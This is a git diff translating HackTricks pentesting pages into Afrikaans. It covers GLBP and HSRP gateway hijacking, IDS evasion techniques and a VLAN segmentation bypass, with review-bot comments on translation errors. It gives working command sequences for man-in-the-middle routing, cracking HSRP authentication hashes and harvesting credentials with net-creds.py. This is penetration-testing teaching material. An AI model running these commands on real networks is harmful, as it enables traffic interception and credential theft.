-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## FHRP Hijacking Overview +## FHRP Kapingsoorsig -### Insights into FHRP -FHRP is designed to provide network robustness by merging multiple routers into a single virtual unit, thereby enhancing load distribution and fault tolerance. Cisco Systems introduced prominent protocols in this suite, such as GLBP and HSRP. +### Insig in FHRP +FHRP is ontwerp om netwerk-robuustheid te bied deur verskeie roeteryers in 'n enkele virtuele eenheid te kombineer, wat sodoende lasverspreiding en fouttoleransie verbeter. Cisco Systems het prominente protokolle in hierdie pakket geïntroduceer, soos GLBP en HSRP. -### GLBP Protocol Insights -Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified. +### GLBP-protokol-insig +GLBP, 'n skepping van Cisco, werk op die TCP/IP-stapel en maak gebruik van UDP op poort 3222 vir kommunikasie. Roeteryers in 'n GLBP-groep ruil "hallo" pakkies uit met tussenposes van 3 sekondes. As 'n roeteryer nie hierdie pakkies vir 10 sekondes stuur nie, word dit as aflyn beskou. Hierdie tydmetings is egter nie vas nie en kan gewysig word. -### GLBP Operations and Load Distribution -GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms: +### GLBP-bedrywighede en lasverspreiding +GLBP onderskei homself deur lasverspreiding oor roeteryers moontlik te maak deur gebruik te maak van 'n enkele virtuele IP gekoppel aan verskeie virtuele MAC-adresse. In 'n GLBP-groep is elke roeteryer betrokke by pakketsending. 
In teenstelling met HSRP/VRRP bied GLBP ware lasbalansering deur verskeie meganismes: -- **Host-Dependent Load Balancing:** Maintains consistent AVF MAC address assignment to a host, essential for stable NAT configurations. -- **Round-Robin Load Balancing:** The default approach, alternating AVF MAC address assignment among requesting hosts. -- **Weighted Round-Robin Load Balancing:** Distributes load based on predefined "Weight" metrics. +- **Gasheer-afhanklike lasbalansering:** Handhaaf 'n konstante AVF MAC-adres toewysing aan 'n gasheer, wat noodsaaklik is vir stabiele NAT-konfigurasies. +- **Round-Robin Lasbalansering:** Die verstekbenadering, waar AVF MAC-adres toewysing afwisselend aan versoekende gasheerders gedoen word. +- **Geweegde Round-Robin Lasbalansering:** Versprei die las gebaseer op voorafbepaalde "Gewig" metriek. -### Key Components and Terminologies in GLBP -- **AVG (Active Virtual Gateway):** The main router, responsible for allocating MAC addresses to peer routers. -- **AVF (Active Virtual Forwarder):** A router designated to manage network traffic. -- **GLBP Priority:** A metric that determines the AVG, starting at a default of 100 and ranging between 1 and 255. -- **GLBP Weight:** Reflects the current load on a router, adjustable either manually or through Object Tracking. -- **GLBP Virtual IP Address:** Serves as the network's default gateway for all connected devices. +### Sleutelkomponente en terminologieë in GLBP +- **AVG (Aktiewe Virtuele Gateway):** Die hoofroeteryer, verantwoordelik vir die toekenning van MAC-adresse aan eweknie-roeteryers. +- **AVF (Aktiewe Virtuele Stuurder):** 'n Roeteryer wat aangewys is om netwerkverkeer te bestuur. +- **GLBP-prioriteit:** 'n Metriek wat die AVG bepaal, begin by 'n verstekwaarde van 100 en wissel tussen 1 en 255. +- **GLBP-gewig:** Weerspieël die huidige las op 'n roeteryer, wat handmatig of deur middel van Objekopsporing aangepas kan word. 
+- **GLBP Virtuele IP-adres:** Diens as die netwerk se verstekpoort vir alle gekoppelde toestelle. -For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UDP port 3222. Routers transmit "hello" packets at 3-second intervals, and are considered non-operational if a packet is missed over a 10-second duration. +Vir interaksie maak GLBP gebruik van die voorbehoude multicast-adres 224.0.0.102 en UDP-poort 3222. Roeteryers stuur "hallo" pakkies uit met tussenposes van 3 sekondes, en word as nie-operasioneel beskou as 'n pakkie oor 'n tydperk van 10 sekondes gemis word. -### GLBP Attack Mechanism -An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection. +### GLBP-aanvalsmeganisme +'n Aanvaller kan die primêre roeteryer word deur 'n GLBP-pakket met die hoogste prioriteitswaarde (255) te stuur. Dit kan lei tot DoS- of MITM-aanvalle, wat verkeersonderskepping of omleiding moontlik maak. -### Executing a GLBP Attack with Loki -[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark. +### Uitvoering van 'n GLBP-aanval met Loki +[Loki](https://github.com/raizo62/loki_on_kali) kan 'n GLBP-aanval uitvoer deur 'n pakket in te spuit met prioriteit en gewig wat op 255 gestel is. Voor-aanvalstappe behels die versameling van inligting soos die virtuele IP-adres, die teenwoordigheid van verifikasie en die prioriteitswaardes van die roeteryer deur middel van hulpmiddels soos Wireshark. -Attack Steps: -1. Switch to promiscuous mode and enable IP forwarding. -2. Identify the target router and retrieve its IP. -3. Generate a Gratuitous ARP. -4. Inject a malicious GLBP packet, impersonating the AVG. -5. 
Assign a secondary IP address to the attacker's network interface, mirroring the GLBP virtual IP. -6. Implement SNAT for complete traffic visibility. -7. Adjust routing to ensure continued internet access through the original AVG router. +Aanvalstappe: +1. Skakel na promiskueuse modus en aktiveer IP-deurstuur. +2. Identifiseer die teikenroeteryer en haal sy IP op. +3. Genereer 'n Gratis ARP. +4. Spuit 'n kwaadwillige GLBP-pakket in, wat die AVG naboots. +5. Ken 'n sekondêre IP-adres toe aan die aanvaller se netwerkinterface, wat die GLBP virtuele IP naboots. +6. Implementeer SNAT vir volledige verkeersigbaarheid. +7. Pas roetebepaling aan om voortgesette internettoegang deur die oorspronklike AVG-roeteryer te verseker. -By following these steps, the attacker positions themselves as a "man in the middle," capable of intercepting and analyzing network traffic, including unencrypted or sensitive data. - -For demonstration, here are the required command snippets: +Deur hierdie stappe te volg, plaas die aanvaller homself as 'n "man in die middel", wat in staat is om netwerkverkeer te onderskep en te analiseer, insluitend onversleutelde of sensitiewe data. +Vir demonstrasie, hier is die vereiste opdragfragmente: ```bash # Enable promiscuous mode and IP forwarding sudo ip link set eth0 promisc on 
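Review bot: step 3 of the attack steps renders "Gratuitous ARP" as "Gratis ARP", which reads as "free-of-charge ARP" and loses the technical meaning; keep the term untranslated ("Gratuitous ARP") or use "ongevraagde ARP". In the same hunk, the last GLBP term line reads "Diens as die netwerk se verstekpoort", where the verb form "Dien as" is needed, and "verstekpoort" is ambiguous with "default port" (prefer "verstek-gateway"). Cisco feature names such as Object Tracking, AVG and AVF are better left untranslated ("Objekopsporing" is not what a reader will find in the IOS documentation).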
@@ -71,82 +70,79 @@ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE sudo route del default sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 ``` +### Passiewe Verduideliking van HSRP-ontvoering met Opdragbesonderhede -Monitoring and intercepting traffic can be done using net-creds.py or similar tools to capture and analyze data flowing through the compromised network. +#### Oorsig van HSRP (Hot Standby Router/Redundancy Protocol) +HSRP is 'n Cisco-eienaardige protokol wat ontwerp is vir netwerkgateway-herstelbaarheid. Dit maak die konfigurasie van verskeie fisiese roeteryers moontlik in 'n enkele logiese eenheid met 'n gedeelde IP-adres. Hierdie logiese eenheid word bestuur deur 'n primêre router wat verantwoordelik is vir die rigting van verkeer. In teenstelling met GLBP, wat metriese soos prioriteit en gewig gebruik vir vragbalansering, steun HSRP op 'n enkele aktiewe router vir verkeersbestuur. -### Passive Explanation of HSRP Hijacking with Command Details +#### Rolle en Terminologie in HSRP +- **HSRP Aktiewe Router**: Die toestel wat as die gateway optree en verkeersvloei bestuur. +- **HSRP Standby Router**: 'n Rugsteunroeter wat gereed is om oor te neem as die aktiewe router misluk. +- **HSRP Groep**: 'n Stel roeteryers wat saamwerk om 'n enkele veerkragtige virtuele router te vorm. +- **HSRP MAC-adres**: 'n Virtuele MAC-adres wat aan die logiese router in die HSRP-opstelling toegewys is. +- **HSRP Virtuele IP-adres**: Die virtuele IP-adres van die HSRP-groep wat optree as die verstekroete vir gekoppelde toestelle. -#### Overview of HSRP (Hot Standby Router/Redundancy Protocol) -HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. 
Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management. +#### HSRP-weergawes +HSRP kom in twee weergawes voor, HSRPv1 en HSRPv2, wat hoofsaaklik verskil in groepskapasiteit, multicast IP-gebruik en virtuele MAC-adresstruktuur. Die protokol maak gebruik van spesifieke multicast IP-adresse vir diensinligtinguitruiling, met Hello-pakette wat elke 3 sekondes gestuur word. 'n Router word as onaktief beskou as geen pakket binne 'n interval van 10 sekondes ontvang word nie. -#### Roles and Terminology in HSRP -- **HSRP Active Router**: The device acting as the gateway, managing traffic flow. -- **HSRP Standby Router**: A backup router, ready to take over if the active router fails. -- **HSRP Group**: A set of routers collaborating to form a single resilient virtual router. -- **HSRP MAC Address**: A virtual MAC address assigned to the logical router in the HSRP setup. -- **HSRP Virtual IP Address**: The virtual IP address of the HSRP group, acting as the default gateway for connected devices. +#### HSRP-aanvalsmeganisme +HSRP-aanvalle behels die gedwonge oorneem van die rol van die Aktiewe Router deur 'n maksimum prioriteitswaarde in te spuit. Dit kan lei tot 'n Man-In-The-Middle (MITM) aanval. Essensiële voor-aanvalstappe sluit in die versameling van data oor die HSRP-opstelling, wat gedoen kan word deur Wireshark vir verkeersanalise. -#### HSRP Versions -HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacity, multicast IP usage, and virtual MAC address structure. The protocol utilizes specific multicast IP addresses for service information exchange, with Hello packets sent every 3 seconds. A router is presumed inactive if no packet is received within a 10-second interval. +#### Stappe om HSRP-verifikasie te omseil +1. Stoor die netwerkverkeer wat HSRP-data bevat as 'n .pcap-lêer. +```shell +tcpdump -w hsrp_traffic.pcap +``` +2. 
Haal MD5-hashes uit die .pcap-lêer met behulp van hsrp2john.py. +```shell +python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes +``` +3. Kraak die MD5-hashes met behulp van John the Ripper. +```shell +john --wordlist=mywordlist.txt hsrp_hashes +``` -#### HSRP Attack Mechanism -HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis. +**Uitvoering van HSRP-inspuiting met Loki** -#### Steps for Bypassing HSRP Authentication -1. Save the network traffic containing HSRP data as a .pcap file. - ```shell - tcpdump -w hsrp_traffic.pcap - ``` -2. Extract MD5 hashes from the .pcap file using hsrp2john.py. - ```shell - python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes - ``` -3. Crack the MD5 hashes using John the Ripper. - ```shell - john --wordlist=mywordlist.txt hsrp_hashes - ``` +1. Begin Loki om HSRP-advertensies te identifiseer. +2. Stel die netwerkinterface in promiskue modus en aktiveer IP-deurstuur. +```shell +sudo ip link set eth0 promisc on +sudo sysctl -w net.ipv4.ip_forward=1 +``` +3. Gebruik Loki om die spesifieke router te teiken, voer die gekraakte HSRP-wagwoord in en doen die nodige konfigurasies om die Aktiewe Router na te boots. +4. Nadat die Aktiewe Router-rol verkry is, konfigureer jou netwerkinterface en IP-tabelle om die wettige verkeer te onderskep. +```shell +sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 +sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +``` +5. Wysig die roetetabel om verkeer deur die vorige Aktiewe Router te roeteer. +```shell +sudo route del default +sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 +``` +6. Gebruik net-creds.py of 'n soortgelyke hulpprogram om legitimasie-inligting van die onderskepte verkeer vas te vang. 
+```shell +sudo python2 net-creds.py -i eth0 +``` -**Executing HSRP Injection with Loki** - -1. Launch Loki to identify HSRP advertisements. -2. Set the network interface to promiscuous mode and enable IP forwarding. - ```shell - sudo ip link set eth0 promisc on - sudo sysctl -w net.ipv4.ip_forward=1 - ``` -3. Use Loki to target the specific router, input the cracked HSRP password, and perform necessary configurations to impersonate the Active Router. -4. After gaining the Active Router role, configure your network interface and IP tables to intercept the legitimate traffic. - ```shell - sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0 - sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE - ``` -5. Modify the routing table to route traffic through the former Active Router. - ```shell - sudo route del default - sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100 - ``` -6. Use net-creds.py or a similar utility to capture credentials from the intercepted traffic. - ```shell - sudo python2 net-creds.py -i eth0 - ``` - -Executing these steps places the attacker in a position to intercept and manipulate traffic, similar to the procedure for GLBP hijacking. This highlights the vulnerability in redundancy protocols like HSRP and the need for robust security measures. +Deur hierdie stappe uit te voer, plaas die aanvaller hom in 'n posisie om verkeer te onderskep en te manipuleer, soortgelyk aan die prosedure vir GLBP-ontvoering. Dit beklemtoon die kwesbaarheid in herstelbaarheidsprotokolle soos HSRP en die behoefte aan robuuste sekuriteitsmaatreëls. -## References +## Verwysings - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
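Review bot: the sentence "Monitoring and intercepting traffic can be done using net-creds.py or similar tools ..." after the GLBP command block is deleted without a translated counterpart, so the GLBP section now ends on the `route add` command and the pointer to net-creds.py is lost; add the Afrikaans line before the "### Passiewe Verduideliking" heading. The fenced blocks inside the numbered steps (e.g. "1. Stoor die netwerkverkeer ..." followed by an unindented "```shell") dropped the three-space indentation the English version had; an unindented fence closes the list at every step and breaks the numbering in the rendered page, so re-indent the fences under their list items. Terminology also flips between "roeteryer", "router" and "Rugsteunroeter" within the HSRP paragraphs, and "herstelbaarheid" means recoverability rather than redundancy ("oortolligheid" or "redundansie").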
diff --git a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index 118cdaa5b..97dc400d0 100644 --- a/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,75 +1,71 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# **TTL Manipulation** +# **TTL-manipulasie** -Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content. +Stuur 'n paar pakkies met 'n TTL wat genoeg is om by die IDS/IPS aan te kom, maar nie genoeg om by die finale stelsel aan te kom nie. En stuur dan nog pakkies met dieselfde volgorde as die ander sodat die IPS/IDS dink dat dit herhalings is en dit nie sal ondersoek nie, maar in werklikheid dra hulle die skadelike inhoud. -**Nmap option:** `--ttlvalue ` +**Nmap-opsie:** `--ttlvalue ` -# Avoiding signatures +# Ontwyk handtekeninge -Just add garbage data to the packets so the IPS/IDS signature is avoided. +Voeg net rommeldata by die pakkies sodat die IPS/IDS-handtekening vermy word. -**Nmap option:** `--data-length 25` +**Nmap-opsie:** `--data-length 25` -# **Fragmented Packets** +# **Gefragmenteerde pakkies** -Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host. +Fragmenteer net die pakkies en stuur hulle. As die IDS/IPS nie die vermoë het om hulle weer saam te stel nie, sal hulle by die finale gasheer aankom. -**Nmap option:** `-f` +**Nmap-opsie:** `-f` -# **Invalid** _**checksum**_ +# **Ongeldige** _**kontrolesom**_ -Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example: +Sensors bereken gewoonlik nie kontrolesom vir prestasie-redes nie. 
'n Aanvaller kan dus 'n pakkie stuur wat deur die sensor **geïnterpreteer word, maar deur die finale gasheer verwerp word.** Voorbeeld: -Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid. +Stuur 'n pakkie met die vlag RST en 'n ongeldige kontrolesom, sodat die IPS/IDS dalk dink dat hierdie pakkie die verbinding gaan sluit, maar die finale gasheer sal die pakkie verwerp omdat die kontrolesom ongeldig is. -# **Uncommon IP and TCP options** +# **Ongewone IP- en TCP-opsies** -A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt. +'N Sensor kan pakkies met sekere vlae en opsies wat in IP- en TCP-koppe ingestel is, ignoreer, terwyl die bestemmingsgasheer die pakkie aanvaar wanneer dit ontvang word. -# **Overlapping** +# **Oorvleueling** -It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\ -Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes. +Dit is moontlik dat wanneer jy 'n pakkie fragmenteer, daar 'n soort oorvleueling tussen pakkies bestaan (miskien oorvleuel die eerste 8 byte van pakkie 2 met die laaste 8 byte van pakkie 1, en die laaste 8 byte van pakkie 2 oorvleuel met die eerste 8 byte van pakkie 3). As die IDS/IPS hulle anders as die finale gasheer weer saamstel, sal 'n ander pakkie geïnterpreteer word.\ +Of dalk kom 2 pakkies met dieselfde verskuiwing en die gasheer moet besluit watter een dit neem. -* **BSD**: It has preference for packets with smaller _offset_. 
For packets with same offset, it will choose the first one. -* **Linux**: Like BSD, but it prefers the last packet with the same offset. -* **First** (Windows): First value that comes, value that stays. -* **Last** (cisco): Last value that comes, value that stays. +* **BSD**: Dit het voorkeur vir pakkies met 'n kleiner _verskuiwing_. Vir pakkies met dieselfde verskuiwing, sal dit die eerste een kies. +* **Linux**: Soos BSD, maar dit verkies die laaste pakkie met dieselfde verskuiwing. +* **Eerste** (Windows): Eerste waarde wat kom, waarde wat bly. +* **Laaste** (cisco): Laaste waarde wat kom, waarde wat bly. -# Tools +# Hulpmiddels * [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
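Review bot: the TTL section carries over "`--ttlvalue `" from the English line, which is not an Nmap option; Nmap's flag is `--ttl <value>`, and the `+` line is the place to correct it rather than propagate the mistake. Style: "'N Sensor" at the start of the "Ongewone IP- en TCP-opsies" paragraph should be "'n Sensor" (Afrikaans capitalises the word after the apostrophe, not the n), and "Laaste (cisco)" keeps the lowercase vendor name from the source where "Cisco" is meant.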
- - diff --git a/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index b8f9dc297..ac50def36 100644 --- a/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -1,45 +1,38 @@ -# Lateral VLAN Segmentation Bypass +# Laterale VLAN-segmentering omseil
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (**for further details check [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).** +As direkte toegang tot 'n skakelaar beskikbaar is, kan VLAN-segmentering omseil word. Dit behels die herkonfigurering van die gekoppelde poort na stammodus, die vestiging van virtuele interfaces vir teikenvlans, en die instelling van IP-adresse, óf dinamies (DHCP) óf staties, afhangende van die scenario (**vir verdere besonderhede, sien [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).** -Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the **include** mask. - -**If CDP is not operational, port identification can be attempted by searching for the MAC address**: +Aanvanklik is identifikasie van die spesifieke gekoppelde poort vereis. Dit kan tipies bereik word deur CDP-boodskappe, of deur te soek na die poort via die **include**-masker. +**As CDP nie operasioneel is nie, kan poortidentifikasie probeer word deur te soek na die MAC-adres**: ``` SW1(config)# show mac address-table | include 0050.0000.0500 ``` - -Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10. 
